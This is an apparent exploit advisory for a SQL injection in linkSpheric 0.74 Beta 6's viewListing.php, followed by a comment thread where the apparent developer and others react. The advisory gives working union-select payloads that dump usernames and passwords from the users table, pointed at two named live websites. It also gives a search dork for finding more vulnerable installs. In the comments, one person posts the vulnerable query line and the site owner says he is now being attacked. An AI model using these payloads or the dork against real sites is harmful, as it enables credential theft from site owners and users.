linkSpheric 0.74 Beta 6 SQL Injection Vuln


[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Author : NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

11 Responses so far.

  1. Anonymous says:

    Hello!

    I represent the group of friends who wrote linkSpheric. LOL!!

    It might seem that you have successfully penetrated this database. I think this is an important consideration for users of linkSpheric software because it was originally designed around php3 and has not been an active project for some years.

    However, because linkSpheric is directory software, in other words, the information contained in a linkSpheric directory is intended to be public, I do not consider this to be a big deal.

    I congratulate the hacker. And if you have seen Viper, tell him I send my regards and best wishes.

  2. NoGe says:

    hello too..

    im looking for bug
    and your script is buggy
    so i post it up
    i dont change any databases

    btw, who is Viper??
    i dont know him.

  3. Anonymous says:

    You are correct. linkSpheric was never completed. This is why we decided to give it away for free :)

    I know you did not harm the database. But I think you were able to execute a script. One of the records you found contains the name of my friend Viper. I thought it is possible that you are Viper playing a joke on me.

    We no longer work on linkSpheric. If you want to, you can repair this vulnerability and you will get full credit. You will find the source code here:

    http://sourceforge.net/projects/linkspheric/

    Because linkSpheric is used by so many people in many different countries, I think it is possible that many people will thank you if you fix this vulnerability.

    I hope you have a good weekend.

  4. Jack says:

    its just take 2 minutes to patch it :) believe me

  5. Vrs-hCk says:

    68: $result = mysql_query("SELECT * FROM listings WHERE id = '$listID' ");

    Try to fix viewListing.php with this line :)

  6. Anonymous says:

    i want to know. are you a believer or are you an infidel?

    Allah Hu Abkbur.

  7. Anonymous says:

    i think you should take responsibility. it is good to be a hacker, but you can be more professional.

    i can tell my programmer to fix the code or you can do. it.

    i think you deserve the credit. i think this will be good for you.

    do you want a job?

  8. Anonymous says:

    friend, now everybody is hacking me. what have you done to me?

  9. NoGe says:

    what the fuck??
    if you have programmer, you can tell your progammer to fix it. DONT BE LAZY!!

    ==========
    i want to know. are you a believer or are you an infidel?
    Allah Hu Abkbur.
    ==========

    whats that supossed to mean?
    no religious bias here!!

  10. Anonymous says:

    lols. ok. i thought you were attacking me because i am muslim. no problem.

    you must understand that i am old and retired. i am not a young man. i use all the money i get now to feed my kids. so you are smart and young. i have no desire to fight with you.

    but i also appreciate your sense of humor.

    can i bless you?

    May God, Allah, bless you and keep you
    May Allah make His face to shine upon you. May Allah give you increase, both you and your children so that you may dwell in the house of Allah forever. So that you will be happy.

    Bless you hacker. you are a good hacker.

  11. Jack says:

    woooyoooo ^^
    feel the sensation.

    Ge, take the code, patch, and re-publish. full credits eh?

    stupid code